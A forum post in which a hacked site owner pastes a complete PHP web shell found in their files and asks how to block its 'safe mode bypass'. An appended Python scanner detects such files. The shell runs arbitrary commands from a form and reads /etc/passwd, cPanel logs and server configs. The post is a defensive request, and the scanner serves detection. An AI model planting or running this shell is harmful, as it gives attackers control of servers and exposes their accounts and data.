I got hacked and the following code was placed within my files:
Code:
<?
/*
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would I patch this? Like, is there any code I can add to a global file to prevent this "safemode bypass"?
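
Finding every copy of a file like this comes before any hardening. As an added example (not part of the original post), the following triage scanner walks a web root and flags PHP files showing the traits visible in the posted shell: `ini_restore` on `safe_mode` or `open_basedir`, and request input alongside a command function called on a variable. The indicator names, the extension list and the flagging rule are assumptions chosen for illustration.

```python
import os
import re
import sys

# Indicators come from the shell posted above; the flagging rule is an assumption.
PATTERNS = {
    "restores_restrictions": r"ini_restore\s*\(\s*['\"](safe_mode|open_basedir)['\"]",
    "probes_exec_functions": r"function_exists\s*\(\s*['\"](exec|shell_exec|system|passthru)['\"]",
    # The lookbehind skips method calls such as $pdo->exec($sql) and curl_exec($ch).
    "runs_variable_command": r"(?<![\w>:$])(exec|shell_exec|system|passthru|popen)\s*\(\s*\$",
    "reads_request_input": r"\$_(POST|GET|REQUEST|COOKIE)\s*\[",
}
INDICATORS = {name: re.compile(rx, re.I) for name, rx in PATTERNS.items()}
PHP_EXTENSIONS = (".php", ".phtml", ".inc")


def scan_source(text):
    """Return the sorted names of the indicators found in one file's source."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def is_suspicious(hits):
    """Flag restriction resets, or request input next to a variable command call."""
    hits = set(hits)
    return ("restores_restrictions" in hits
            or {"runs_variable_command", "reads_request_input"} <= hits)


def scan_tree(root):
    """Walk root and return {path: hits} for every suspicious PHP file."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="latin-1") as fh:  # latin-1 decodes any byte
                    hits = scan_source(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if is_suspicious(hits):
                findings[path] = hits
    return findings


if __name__ == "__main__":
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(f"{path}: {', '.join(hits)}")
```

A hit is a lead for manual review of that file, not proof of compromise.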